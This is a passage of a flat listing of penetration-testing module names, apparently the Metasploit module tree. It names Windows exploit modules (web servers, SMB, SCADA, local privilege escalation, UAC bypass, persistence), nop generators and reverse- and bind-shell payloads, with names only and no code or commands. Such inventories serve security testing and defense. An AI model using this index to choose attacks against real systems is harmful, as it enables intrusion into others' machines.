exploit/windows/http/hp_pcm_snac_update_certificates | exploit/windows/http/hp_pcm_snac_update_domain | exploit/windows/http/hp_power_manager_filename | exploit/windows/http/hp_power_manager_login | exploit/windows/http/hp_sitescope_dns_tool | exploit/windows/http/hp_sitescope_runomagentcommand | exploit/windows/http/hpe_sim_76_amf_deserialization | exploit/windows/http/httpdx_handlepeer | exploit/windows/http/httpdx_tolog_format | exploit/windows/http/ia_webmail | exploit/windows/http/ibm_tivoli_endpoint_bof | exploit/windows/http/ibm_tpmfosd_overflow | exploit/windows/http/ibm_tsm_cad_header | exploit/windows/http/icecast_header | exploit/windows/http/integard_password_bof | exploit/windows/http/intersystems_cache | exploit/windows/http/intrasrv_bof | exploit/windows/http/ipswitch_wug_maincfgret | exploit/windows/http/ivanti_avalanche_filestoreconfig_upload | exploit/windows/http/ivanti_epm_recordgoodapp_sqli_rce | exploit/windows/http/jira_collector_traversal | exploit/windows/http/kaseya_uploader | exploit/windows/http/kaseya_uploadimage_file_upload | exploit/windows/http/kentico_staging_syncserver | exploit/windows/http/kolibri_http | exploit/windows/http/landesk_thinkmanagement_upload_asp | exploit/windows/http/lexmark_markvision_gfd_upload | exploit/windows/http/lg_simple_editor_rce | exploit/windows/http/lg_simple_editor_rce_uploadvideo | exploit/windows/http/mailenable_auth_header | exploit/windows/http/manage_engine_opmanager_rce | exploit/windows/http/manageengine_adaudit_plus_authenticated_rce | exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219 | exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection | exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539 | exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810 | exploit/windows/http/manageengine_adshacluster_rce | exploit/windows/http/manageengine_appmanager_exec | exploit/windows/http/manageengine_apps_mngr | exploit/windows/http/manageengine_connectionid_write | exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966 | exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077 | exploit/windows/http/maxdb_webdbm_database | exploit/windows/http/maxdb_webdbm_get_overflow | exploit/windows/http/mcafee_epolicy_source | exploit/windows/http/mdaemon_worldclient_form2raw | exploit/windows/http/minishare_get_overflow | exploit/windows/http/miniweb_upload_wbem | exploit/windows/http/moveit_cve_2023_34362 | exploit/windows/http/navicopa_get_overflow | exploit/windows/http/netdecision_http_bof | exploit/windows/http/netgear_nms_rce | exploit/windows/http/netmotion_mobility_mvcutil_deserialization | exploit/windows/http/northstar_c2_xss_to_agent_rce | exploit/windows/http/novell_imanager_upload | exploit/windows/http/novell_mdm_lfi | exploit/windows/http/novell_messenger_acceptlang | exploit/windows/http/nowsms | exploit/windows/http/nscp_authenticated_rce | exploit/windows/http/oats_weblogic_console | exploit/windows/http/octopusdeploy_deploy | exploit/windows/http/oracle9i_xdb_pass | exploit/windows/http/oracle_beehive_evaluation | exploit/windows/http/oracle_beehive_prepareaudiotoplay | exploit/windows/http/oracle_btm_writetofile | exploit/windows/http/oracle_endeca_exec | exploit/windows/http/oracle_event_processing_upload | exploit/windows/http/osb_uname_jlist | exploit/windows/http/peercast_url | exploit/windows/http/pgadmin_binary_path_api | exploit/windows/http/php_apache_request_headers_bof | exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577 | exploit/windows/http/plesk_mylittleadmin_viewstate | exploit/windows/http/plex_unpickle_dict_rce | exploit/windows/http/privatewire_gateway | exploit/windows/http/prtg_authenticated_rce | exploit/windows/http/prtg_authenticated_rce_cve_2023_32781 | exploit/windows/http/psoproxy91_overflow | exploit/windows/http/rabidhamster_r4_log | exploit/windows/http/rejetto_hfs_exec | exploit/windows/http/rejetto_hfs_rce_cve_2024_23692 | exploit/windows/http/sambar6_search_results | exploit/windows/http/sap_configservlet_exec_noauth | exploit/windows/http/sap_host_control_cmd_exec | exploit/windows/http/sapdb_webtools | exploit/windows/http/savant_31_overflow | exploit/windows/http/sepm_auth_bypass_rce | exploit/windows/http/serviio_checkstreamurl_cmd_exec | exploit/windows/http/servu_session_cookie | exploit/windows/http/sharepoint_data_deserialization | exploit/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce | exploit/windows/http/sharepoint_ssi_viewstate | exploit/windows/http/sharepoint_unsafe_control | exploit/windows/http/sharepoint_workflows_xoml | exploit/windows/http/shoutcast_format | exploit/windows/http/shttpd_post | exploit/windows/http/sitecore_xp_cve_2021_42237 | exploit/windows/http/smartermail_rce | exploit/windows/http/softing_sis_rce | exploit/windows/http/solarwinds_fsm_userlogin | exploit/windows/http/solarwinds_storage_manager_sql | exploit/windows/http/sonicwall_scrutinizer_sqli | exploit/windows/http/ssrs_navcorrector_viewstate | exploit/windows/http/steamcast_useragent | exploit/windows/http/sws_connection_bof | exploit/windows/http/sybase_easerver | exploit/windows/http/syncbreeze_bof | exploit/windows/http/sysax_create_folder | exploit/windows/http/telerik_rau_deserialization | exploit/windows/http/telerik_report_server_deserialization | exploit/windows/http/tomcat_cgi_cmdlineargs | exploit/windows/http/trackercam_phparg_overflow | exploit/windows/http/trackit_file_upload | exploit/windows/http/trendmicro_officescan | exploit/windows/http/trendmicro_officescan_widget_exec | exploit/windows/http/ultraminihttp_bof | exploit/windows/http/umbraco_upload_aspx | exploit/windows/http/vmware_vcenter_chargeback_upload | exploit/windows/http/vxsrchs_bof | exploit/windows/http/webster_http | exploit/windows/http/ws_ftp_rce_cve_2023_40044 | exploit/windows/http/xampp_webdav_upload_php | exploit/windows/http/xitami_if_mod_since | exploit/windows/http/zentao_pro_rce | exploit/windows/http/zenworks_assetmgmt_uploadservlet | exploit/windows/http/zenworks_uploadservlet | exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce | . | ibm (1) . | exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce | . | iis (9) . | exploit/windows/iis/iis_webdav_scstoragepathfromurl | exploit/windows/iis/iis_webdav_upload_asp | exploit/windows/iis/ms01_023_printer | exploit/windows/iis/ms01_026_dbldecode | exploit/windows/iis/ms01_033_idq | exploit/windows/iis/ms02_018_htr | exploit/windows/iis/ms02_065_msadc | exploit/windows/iis/ms03_007_ntdll_webdav | exploit/windows/iis/msadc | . | imap (16) . | exploit/windows/imap/eudora_list | exploit/windows/imap/imail_delete | exploit/windows/imap/ipswitch_search | exploit/windows/imap/mailenable_login | exploit/windows/imap/mailenable_status | exploit/windows/imap/mailenable_w3c_select | exploit/windows/imap/mdaemon_cram_md5 | exploit/windows/imap/mdaemon_fetch | exploit/windows/imap/mercur_imap_select_overflow | exploit/windows/imap/mercur_login | exploit/windows/imap/mercury_login | exploit/windows/imap/mercury_rename | exploit/windows/imap/novell_netmail_append | exploit/windows/imap/novell_netmail_auth | exploit/windows/imap/novell_netmail_status | exploit/windows/imap/novell_netmail_subscribe | . | isapi (5) . | exploit/windows/isapi/ms00_094_pbserver | exploit/windows/isapi/ms03_022_nsiislog_post | exploit/windows/isapi/ms03_051_fp30reg_chunked | exploit/windows/isapi/rsa_webagent_redirect | exploit/windows/isapi/w3who_query | . | ldap (2) . | exploit/windows/ldap/imail_thc | exploit/windows/ldap/pgp_keyserver7 | . | license (4) . | exploit/windows/license/calicclnt_getconfig | exploit/windows/license/calicserv_getconfig | exploit/windows/license/flexnet_lmgrd_bof | exploit/windows/license/sentinel_lm7_udp | . | local (113) . | exploit/windows/local/adobe_sandbox_adobecollabsync | exploit/windows/local/agnitum_outpost_acs | exploit/windows/local/alpc_taskscheduler | exploit/windows/local/always_install_elevated | exploit/windows/local/anyconnect_lpe | exploit/windows/local/applocker_bypass | exploit/windows/local/appxsvc_hard_link_privesc | exploit/windows/local/ask | exploit/windows/local/bits_ntlm_token_impersonation | exploit/windows/local/bthpan | exploit/windows/local/bypassuac | exploit/windows/local/bypassuac_comhijack | exploit/windows/local/bypassuac_dotnet_profiler | exploit/windows/local/bypassuac_eventvwr | exploit/windows/local/bypassuac_fodhelper | exploit/windows/local/bypassuac_injection | exploit/windows/local/bypassuac_injection_winsxs | exploit/windows/local/bypassuac_sdclt | exploit/windows/local/bypassuac_silentcleanup | exploit/windows/local/bypassuac_sluihijack | exploit/windows/local/bypassuac_vbs | exploit/windows/local/bypassuac_windows_store_filesys | exploit/windows/local/bypassuac_windows_store_reg | exploit/windows/local/canon_driver_privesc | exploit/windows/local/capcom_sys_exec | exploit/windows/local/comahawk | exploit/windows/local/current_user_psexec | exploit/windows/local/cve_2017_8464_lnk_lpe | exploit/windows/local/cve_2018_8453_win32k_priv_esc | exploit/windows/local/cve_2019_1458_wizardopium | exploit/windows/local/cve_2020_0668_service_tracing | exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move | exploit/windows/local/cve_2020_0796_smbghost | exploit/windows/local/cve_2020_1048_printerdemon | exploit/windows/local/cve_2020_1054_drawiconex_lpe | exploit/windows/local/cve_2020_1313_system_orchestrator | exploit/windows/local/cve_2020_1337_printerdemon | exploit/windows/local/cve_2020_17136 | exploit/windows/local/cve_2021_21551_dbutil_memmove | exploit/windows/local/cve_2021_40449 | exploit/windows/local/cve_2022_21882_win32k | exploit/windows/local/cve_2022_21999_spoolfool_privesc | exploit/windows/local/cve_2022_26904_superprofile | exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver | exploit/windows/local/cve_2023_21768_afd_lpe | exploit/windows/local/cve_2023_28252_clfs_driver | exploit/windows/local/cve_2024_30088_authz_basep | exploit/windows/local/dnsadmin_serverlevelplugindll | exploit/windows/local/docker_credential_wincred | exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc | exploit/windows/local/gog_galaxyclientservice_privesc | exploit/windows/local/ikeext_service | exploit/windows/local/ipass_launch_app | exploit/windows/local/lenovo_systemupdate | exploit/windows/local/lexmark_driver_privesc | exploit/windows/local/microfocus_operations_privesc | exploit/windows/local/mov_ss | exploit/windows/local/mqac_write | exploit/windows/local/ms10_015_kitrap0d | exploit/windows/local/ms10_092_schelevator | exploit/windows/local/ms11_080_afdjoinleaf | exploit/windows/local/ms13_005_hwnd_broadcast | exploit/windows/local/ms13_053_schlamperei | exploit/windows/local/ms13_081_track_popup_menu | exploit/windows/local/ms13_097_ie_registry_symlink | exploit/windows/local/ms14_009_ie_dfsvc | exploit/windows/local/ms14_058_track_popup_menu | exploit/windows/local/ms14_070_tcpip_ioctl | exploit/windows/local/ms15_004_tswbproxy | exploit/windows/local/ms15_051_client_copy_image | exploit/windows/local/ms15_078_atmfd_bof | exploit/windows/local/ms16_014_wmi_recv_notif | exploit/windows/local/ms16_016_webdav | exploit/windows/local/ms16_032_secondary_logon_handle_privesc | exploit/windows/local/ms16_075_reflection | exploit/windows/local/ms16_075_reflection_juicy | exploit/windows/local/ms18_8120_win32k_privesc | exploit/windows/local/ms_ndproxy | exploit/windows/local/novell_client_nicm | exploit/windows/local/novell_client_nwfs | exploit/windows/local/nscp_pe | exploit/windows/local/ntapphelpcachecontrol | exploit/windows/local/ntusermndragover | exploit/windows/local/nvidia_nvsvc | exploit/windows/local/panda_psevents | exploit/windows/local/payload_inject | exploit/windows/local/persistence | exploit/windows/local/persistence_image_exec_options | exploit/windows/local/persistence_service | exploit/windows/local/plantronics_hub_spokesupdateservice_privesc | exploit/windows/local/powershell_cmd_upgrade | exploit/windows/local/powershell_remoting | exploit/windows/local/ppr_flatten_rec | exploit/windows/local/ps_persist | exploit/windows/local/ps_wmi_exec | exploit/windows/local/pxeexploit | exploit/windows/local/razer_zwopenprocess | exploit/windows/local/registry_persistence | exploit/windows/local/ricoh_driver_privesc | exploit/windows/local/run_as | exploit/windows/local/s4u_persistence | exploit/windows/local/service_permissions | exploit/windows/local/srclient_dll_hijacking | exploit/windows/local/tokenmagic | exploit/windows/local/unquoted_service_path | exploit/windows/local/virtual_box_guest_additions | exploit/windows/local/virtual_box_opengl_escape | exploit/windows/local/vss_persistence | exploit/windows/local/webexec | exploit/windows/local/win_error_cve_2023_36874 | exploit/windows/local/windscribe_windscribeservice_priv_esc | exploit/windows/local/wmi | exploit/windows/local/wmi_persistence | . | lotus (4) . | exploit/windows/lotus/domino_http_accept_language | exploit/windows/lotus/domino_icalendar_organizer | exploit/windows/lotus/domino_sametime_stmux | exploit/windows/lotus/lotusnotes_lzh | . | lpd (4) . | exploit/windows/lpd/hummingbird_exceed | exploit/windows/lpd/niprint | exploit/windows/lpd/saplpd | exploit/windows/lpd/wincomlpd_admin | . | misc (115) . | exploit/windows/misc/achat_bof | exploit/windows/misc/actfax_raw_server_bof | exploit/windows/misc/agentxpp_receive_agentx | exploit/windows/misc/ahsay_backup_fileupload | exploit/windows/misc/ais_esel_server_rce | exploit/windows/misc/allmediaserver_bof | exploit/windows/misc/altiris_ds_sqli | exploit/windows/misc/apple_quicktime_rtsp_response | exploit/windows/misc/asus_dpcproxy_overflow | exploit/windows/misc/avaya_winpmd_unihostrouter | exploit/windows/misc/avidphoneticindexer | exploit/windows/misc/bakbone_netvault_heap | exploit/windows/misc/bcaaa_bof | exploit/windows/misc/bigant_server | exploit/windows/misc/bigant_server_250 | exploit/windows/misc/bigant_server_dupf_upload | exploit/windows/misc/bigant_server_sch_dupf_bof | exploit/windows/misc/bigant_server_usv | exploit/windows/misc/bomberclone_overflow | exploit/windows/misc/bopup_comm | exploit/windows/misc/borland_interbase | exploit/windows/misc/borland_starteam | exploit/windows/misc/citrix_streamprocess | exploit/windows/misc/citrix_streamprocess_data_msg | exploit/windows/misc/citrix_streamprocess_get_boot_record_request | exploit/windows/misc/citrix_streamprocess_get_footer | exploit/windows/misc/citrix_streamprocess_get_objects | exploit/windows/misc/cloudme_sync | exploit/windows/misc/commvault_cmd_exec | exploit/windows/misc/crosschex_device_bof | exploit/windows/misc/cve_2022_28381_allmediaserver_bof | exploit/windows/misc/delta_electronics_infrasuite_deserialization | exploit/windows/misc/disk_savvy_adm | exploit/windows/misc/doubletake | exploit/windows/misc/eiqnetworks_esa | exploit/windows/misc/eiqnetworks_esa_topology | exploit/windows/misc/enterasys_netsight_syslog_bof | exploit/windows/misc/eureka_mail_err | exploit/windows/misc/fb_cnct_group | exploit/windows/misc/fb_isc_attach_database | exploit/windows/misc/fb_isc_create_database | exploit/windows/misc/fb_svc_attach | exploit/windows/misc/gh0st | exploit/windows/misc/gimp_script_fu | exploit/windows/misc/hp_dataprotector_cmd_exec | exploit/windows/misc/hp_dataprotector_crs | exploit/windows/misc/hp_dataprotector_dtbclslogin | exploit/windows/misc/hp_dataprotector_encrypted_comms | exploit/windows/misc/hp_dataprotector_exec_bar | exploit/windows/misc/hp_dataprotector_install_service | exploit/windows/misc/hp_dataprotector_new_folder | exploit/windows/misc/hp_dataprotector_traversal | exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce | exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce | exploit/windows/misc/hp_imc_uam | exploit/windows/misc/hp_loadrunner_magentproc | exploit/windows/misc/hp_loadrunner_magentproc_cmdexec | exploit/windows/misc/hp_magentservice | exploit/windows/misc/hp_omniinet_1 | exploit/windows/misc/hp_omniinet_2 | exploit/windows/misc/hp_omniinet_3 | exploit/windows/misc/hp_omniinet_4 | exploit/windows/misc/hp_operations_agent_coda_34 | exploit/windows/misc/hp_operations_agent_coda_8c | exploit/windows/misc/hp_ovtrace | exploit/windows/misc/hta_server | exploit/windows/misc/ib_isc_attach_database | exploit/windows/misc/ib_isc_create_database | exploit/windows/misc/ib_svc_attach | exploit/windows/misc/ibm_cognos_tm1admsd_bof | exploit/windows/misc/ibm_director_cim_dllinject | exploit/windows/misc/ibm_tsm_cad_ping | exploit/windows/misc/ibm_tsm_rca_dicugetidentify | exploit/windows/misc/ibm_websphere_java_deserialize | exploit/windows/misc/itunes_extm3u_bof | exploit/windows/misc/ivanti_avalanche_mdm_bof | exploit/windows/misc/landesk_aolnsrvr | exploit/windows/misc/lianja_db_net | exploit/windows/misc/manageengine_eventlog_analyzer_rce | exploit/windows/misc/mercury_phonebook | exploit/windows/misc/mini_stream | exploit/windows/misc/mirc_privmsg_server | exploit/windows/misc/mobile_mouse_rce | exploit/windows/misc/ms07_064_sami | exploit/windows/misc/ms10_104_sharepoint | exploit/windows/misc/netcat110_nt | exploit/windows/misc/nettransport | exploit/windows/misc/nvidia_mental_ray | exploit/windows/misc/plugx | exploit/windows/misc/poisonivy_21x_bof | exploit/windows/misc/poisonivy_bof | exploit/windows/misc/poppeeper_date | exploit/windows/misc/poppeeper_uidl | exploit/windows/misc/realtek_playlist | exploit/windows/misc/remote_control_collection_rce | exploit/windows/misc/remote_mouse_rce | exploit/windows/misc/sap_2005_license | exploit/windows/misc/sap_netweaver_dispatcher | exploit/windows/misc/shixxnote_font | exploit/windows/misc/solarwinds_amqp_deserialization | exploit/windows/misc/solidworks_workgroup_pdmwservice_file_write | exploit/windows/misc/splayer_content_type | exploit/windows/misc/stream_down_bof | exploit/windows/misc/talkative_response | exploit/windows/misc/tiny_identd_overflow | exploit/windows/misc/trendmicro_cmdprocessor_addtask | exploit/windows/misc/ufo_ai | exploit/windows/misc/unified_remote_rce | exploit/windows/misc/veeam_one_agent_deserialization | exploit/windows/misc/vmhgfs_webdav_dll_sideload | exploit/windows/misc/webdav_delivery | exploit/windows/misc/wifi_mouse_rce | exploit/windows/misc/windows_rsh | exploit/windows/misc/wireshark_lua | exploit/windows/misc/wireshark_packet_dect | . | mmsp (1) . | exploit/windows/mmsp/ms10_025_wmss_connect_funnel | . | motorola (1) . | exploit/windows/motorola/timbuktu_fileupload | . | mssql (9) . | exploit/windows/mssql/lyris_listmanager_weak_pass | exploit/windows/mssql/ms02_039_slammer | exploit/windows/mssql/ms02_056_hello | exploit/windows/mssql/ms09_004_sp_replwritetovarbin | exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli | exploit/windows/mssql/mssql_clr_payload | exploit/windows/mssql/mssql_linkcrawler | exploit/windows/mssql/mssql_payload | exploit/windows/mssql/mssql_payload_sqli | . | mysql (4) . | exploit/windows/mysql/mysql_mof | exploit/windows/mysql/mysql_start_up | exploit/windows/mysql/mysql_yassl_hello | exploit/windows/mysql/scrutinizer_upload_exec | . | nfs (1) . | exploit/windows/nfs/xlink_nfsd | . | nimsoft (1) . | exploit/windows/nimsoft/nimcontroller_bof | . | nntp (1) . | exploit/windows/nntp/ms05_030_nntp | . | novell (9) . | exploit/windows/novell/file_reporter_fsfui_upload | exploit/windows/novell/groupwisemessenger_client | exploit/windows/novell/netiq_pum_eval | exploit/windows/novell/nmap_stor | exploit/windows/novell/zenworks_desktop_agent | exploit/windows/novell/zenworks_preboot_op21_bof | exploit/windows/novell/zenworks_preboot_op4c_bof | exploit/windows/novell/zenworks_preboot_op6_bof | exploit/windows/novell/zenworks_preboot_op6c_bof | . | nuuo (2) . | exploit/windows/nuuo/nuuo_cms_fu | exploit/windows/nuuo/nuuo_cms_sqli | . | oracle (6) . | exploit/windows/oracle/client_system_analyzer_upload | exploit/windows/oracle/extjob | exploit/windows/oracle/osb_ndmp_auth | exploit/windows/oracle/tns_arguments | exploit/windows/oracle/tns_auth_sesskey | exploit/windows/oracle/tns_service_name | . | pop3 (1) . | exploit/windows/pop3/seattlelab_pass | . | postgres (1) . | exploit/windows/postgres/postgres_payload | . | proxy (4) . | exploit/windows/proxy/bluecoat_winproxy_host | exploit/windows/proxy/ccproxy_telnet_ping | exploit/windows/proxy/proxypro_http_get | exploit/windows/proxy/qbik_wingate_wwwproxy | . | rdp (2) . | exploit/windows/rdp/cve_2019_0708_bluekeep_rce | exploit/windows/rdp/rdp_doublepulsar_rce | . | sage (1) . | exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec | . | scada (37) . | exploit/windows/scada/abb_wserver_exec | exploit/windows/scada/advantech_webaccess_dashboard_file_upload | exploit/windows/scada/advantech_webaccess_webvrpcs_bof | exploit/windows/scada/citect_scada_odbc | exploit/windows/scada/codesys_gateway_server_traversal | exploit/windows/scada/codesys_web_server | exploit/windows/scada/daq_factory_bof | exploit/windows/scada/delta_ia_commgr_bof | exploit/windows/scada/diaenergie_sqli | exploit/windows/scada/factorylink_csservice | exploit/windows/scada/factorylink_vrn_09 | exploit/windows/scada/ge_proficy_cimplicity_gefebt | exploit/windows/scada/iconics_genbroker | exploit/windows/scada/iconics_webhmi_setactivexguid | exploit/windows/scada/igss9_igssdataserver_listall | exploit/windows/scada/igss9_igssdataserver_rename | exploit/windows/scada/igss9_misc | exploit/windows/scada/igss_exec_17 | exploit/windows/scada/indusoft_webstudio_exec | exploit/windows/scada/moxa_mdmtool | exploit/windows/scada/mypro_cmdexe | exploit/windows/scada/procyon_core_server | exploit/windows/scada/realwin | exploit/windows/scada/realwin_on_fc_binfile_a | exploit/windows/scada/realwin_on_fcs_login | exploit/windows/scada/realwin_scpc_initialize | exploit/windows/scada/realwin_scpc_initialize_rf | exploit/windows/scada/realwin_scpc_txtevent | exploit/windows/scada/rockwell_factorytalk_rce | exploit/windows/scada/scadapro_cmdexe | exploit/windows/scada/sunway_force_control_netdbsrv | exploit/windows/scada/winlog_runtime | exploit/windows/scada/winlog_runtime_2 | exploit/windows/scada/yokogawa_bkbcopyd_bof | exploit/windows/scada/yokogawa_bkesimmgr_bof | exploit/windows/scada/yokogawa_bkfsim_vhfd | exploit/windows/scada/yokogawa_bkhodeq_bof | . | sip (3) . | exploit/windows/sip/aim_triton_cseq | exploit/windows/sip/sipxezphone_cseq | exploit/windows/sip/sipxphone_cseq | . | smb (32) . | exploit/windows/smb/cve_2020_0796_smbghost | exploit/windows/smb/generic_smb_dll_injection | exploit/windows/smb/group_policy_startup | exploit/windows/smb/ipass_pipe_exec | exploit/windows/smb/ms03_049_netapi | exploit/windows/smb/ms04_007_killbill | exploit/windows/smb/ms04_011_lsass | exploit/windows/smb/ms04_031_netdde | exploit/windows/smb/ms05_039_pnp | exploit/windows/smb/ms06_025_rasmans_reg | exploit/windows/smb/ms06_025_rras | exploit/windows/smb/ms06_040_netapi | exploit/windows/smb/ms06_066_nwapi | exploit/windows/smb/ms06_066_nwwks | exploit/windows/smb/ms06_070_wkssvc | exploit/windows/smb/ms07_029_msdns_zonename | exploit/windows/smb/ms08_067_netapi | exploit/windows/smb/ms09_050_smb2_negotiate_func_index | exploit/windows/smb/ms10_046_shortcut_icon_dllloader | exploit/windows/smb/ms10_061_spoolss | exploit/windows/smb/ms15_020_shortcut_icon_dllloader | exploit/windows/smb/ms17_010_eternalblue | exploit/windows/smb/ms17_010_psexec | exploit/windows/smb/netidentity_xtierrpcpipe | exploit/windows/smb/psexec | exploit/windows/smb/smb_delivery | exploit/windows/smb/smb_doublepulsar_rce | exploit/windows/smb/smb_relay | exploit/windows/smb/smb_rras_erraticgopher | exploit/windows/smb/smb_shadow | exploit/windows/smb/timbuktu_plughntcommand_bof | exploit/windows/smb/webexec | . | smtp (7) . | exploit/windows/smtp/mailcarrier_smtp_ehlo | exploit/windows/smtp/mercury_cram_md5 | exploit/windows/smtp/ms03_046_exchange2000_xexch50 | exploit/windows/smtp/njstar_smtp_bof | exploit/windows/smtp/sysgauge_client_bof | exploit/windows/smtp/wmailserver | exploit/windows/smtp/ypops_overflow1 | . | ssh (6) . | exploit/windows/ssh/freeftpd_key_exchange | exploit/windows/ssh/freesshd_authbypass | exploit/windows/ssh/freesshd_key_exchange | exploit/windows/ssh/putty_msg_debug | exploit/windows/ssh/securecrt_ssh1 | exploit/windows/ssh/sysax_ssh_username | . | ssl (1) . | exploit/windows/ssl/ms04_011_pct | . | telnet (2) . | exploit/windows/telnet/gamsoft_telsrv_username | exploit/windows/telnet/goodtech_telnet | . | tftp (11) . | exploit/windows/tftp/attftp_long_filename | exploit/windows/tftp/distinct_tftp_traversal | exploit/windows/tftp/dlink_long_filename | exploit/windows/tftp/futuresoft_transfermode | exploit/windows/tftp/netdecision_tftp_traversal | exploit/windows/tftp/opentftp_error_code | exploit/windows/tftp/quick_tftp_pro_mode | exploit/windows/tftp/tftpd32_long_filename | exploit/windows/tftp/tftpdwin_long_filename | exploit/windows/tftp/tftpserver_wrq_bof | exploit/windows/tftp/threectftpsvc_long_mode | . | unicenter (1) . | exploit/windows/unicenter/cam_log_security | . | vnc (4) . | exploit/windows/vnc/realvnc_client | exploit/windows/vnc/ultravnc_client | exploit/windows/vnc/ultravnc_viewer_bof | exploit/windows/vnc/winvnc_http_get | . | vpn (1) . | exploit/windows/vpn/safenet_ike_11 | . | winrm (1) . | exploit/windows/winrm/winrm_script_exec | . | wins (1) . | exploit/windows/wins/ms04_045_wins | . | . | . | nop (11) . | aarch64 (1) . | nop/aarch64/simple | . | armle (1) . | nop/armle/simple | . | cmd (1) . | nop/cmd/generic | . | mipsbe (1) . | nop/mipsbe/better | . | php (1) . | nop/php/generic | . | ppc (1) . | nop/ppc/simple | . | sparc (1) . | nop/sparc/random | . | tty (1) . | nop/tty/generic | . | x64 (1) . | nop/x64/simple | . | x86 (2) . | nop/x86/opty2 | nop/x86/single_byte | . | . | payload (1468) . | aix (4) . | ppc (4) . | payload/aix/ppc/shell_bind_tcp | payload/aix/ppc/shell_find_port | payload/aix/ppc/shell_interact | payload/aix/ppc/shell_reverse_tcp | . | . | android (9) . | meterpreter (3) . | payload/android/meterpreter/reverse_http | payload/android/meterpreter/reverse_https | payload/android/meterpreter/reverse_tcp | . | shell (3) . | payload/android/shell/reverse_http | payload/android/shell/reverse_https | payload/android/shell/reverse_tcp | . | payload/android/meterpreter_reverse_http | payload/android/meterpreter_reverse_https | payload/android/meterpreter_reverse_tcp | . | apple_ios (7) . | aarch64 (4) . | payload/apple_ios/aarch64/meterpreter_reverse_http | payload/apple_ios/aarch64/meterpreter_reverse_https | payload/apple_ios/aarch64/meterpreter_reverse_tcp | payload/apple_ios/aarch64/shell_reverse_tcp | . | armle (3) . | payload/apple_ios/armle/meterpreter_reverse_http | payload/apple_ios/armle/meterpreter_reverse_https | payload/apple_ios/armle/meterpreter_reverse_tcp | . | . | bsd (24) . | sparc (2) . | payload/bsd/sparc/shell_bind_tcp | payload/bsd/sparc/shell_reverse_tcp | . | vax (1) . | payload/bsd/vax/shell_reverse_tcp | . | x64 (7) . | payload/bsd/x64/exec | payload/bsd/x64/shell_bind_ipv6_tcp | payload/bsd/x64/shell_bind_tcp | payload/bsd/x64/shell_bind_tcp_small | payload/bsd/x64/shell_reverse_ipv6_tcp | payload/bsd/x64/shell_reverse_tcp | payload/bsd/x64/shell_reverse_tcp_small | . | x86 (14) . | shell (5) . | payload/bsd/x86/shell/bind_ipv6_tcp | payload/bsd/x86/shell/bind_tcp | payload/bsd/x86/shell/find_tag | payload/bsd/x86/shell/reverse_ipv6_tcp | payload/bsd/x86/shell/reverse_tcp | . | payload/bsd/x86/exec | payload/bsd/x86/metsvc_bind_tcp | payload/bsd/x86/metsvc_reverse_tcp | payload/bsd/x86/shell_bind_tcp | payload/bsd/x86/shell_bind_tcp_ipv6 | payload/bsd/x86/shell_find_port | payload/bsd/x86/shell_find_tag | payload/bsd/x86/shell_reverse_tcp | payload/bsd/x86/shell_reverse_tcp_ipv6 | . | . | bsdi (5) . | x86 (5) . | shell (2) . | payload/bsdi/x86/shell/bind_tcp | payload/bsdi/x86/shell/reverse_tcp | . | payload/bsdi/x86/shell_bind_tcp | payload/bsdi/x86/shell_find_port | payload/bsdi/x86/shell_reverse_tcp | . | . | cmd (884) . | linux (177) . | http (59) . | mips64 (3) . | payload/cmd/linux/http/mips64/meterpreter_reverse_http | payload/cmd/linux/http/mips64/meterpreter_reverse_https | payload/cmd/linux/http/mips64/meterpreter_reverse_tcp | . | x64 (18) . | meterpreter (3) . | payload/cmd/linux/http/x64/meterpreter/bind_tcp | payload/cmd/linux/http/x64/meterpreter/reverse_sctp | payload/cmd/linux/http/x64/meterpreter/reverse_tcp | . | shell (3) . | payload/cmd/linux/http/x64/shell/bind_tcp | payload/cmd/linux/http/x64/shell/reverse_sctp | payload/cmd/linux/http/x64/shell/reverse_tcp | . | payload/cmd/linux/http/x64/exec | payload/cmd/linux/http/x64/meterpreter_reverse_http | payload/cmd/linux/http/x64/meterpreter_reverse_https | payload/cmd/linux/http/x64/meterpreter_reverse_tcp | payload/cmd/linux/http/x64/pingback_bind_tcp | payload/cmd/linux/http/x64/pingback_reverse_tcp | payload/cmd/linux/http/x64/shell_bind_ipv6_tcp | payload/cmd/linux/http/x64/shell_bind_tcp | payload/cmd/linux/http/x64/shell_bind_tcp_random_port | payload/cmd/linux/http/x64/shell_find_port | payload/cmd/linux/http/x64/shell_reverse_ipv6_tcp | payload/cmd/linux/http/x64/shell_reverse_tcp | . | x86 (38) . | generic (2) . | payload/cmd/linux/http/x86/generic/debug_trap | payload/cmd/linux/http/x86/generic/tight_loop | . | meterpreter (10) . | payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp | payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp | payload/cmd/linux/http/x86/meterpreter/bind_tcp | payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid | payload/cmd/linux/http/x86/meterpreter/find_tag | payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp | payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp | payload/cmd/linux/http/x86/meterpreter/reverse_tcp | payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid | . | shell (10) . | payload/cmd/linux/http/x86/shell/bind_ipv6_tcp | payload/cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid | payload/cmd/linux/http/x86/shell/bind_nonx_tcp | payload/cmd/linux/http/x86/shell/bind_tcp | payload/cmd/linux/http/x86/shell/bind_tcp_uuid | payload/cmd/linux/http/x86/shell/find_tag | payload/cmd/linux/http/x86/shell/reverse_ipv6_tcp | 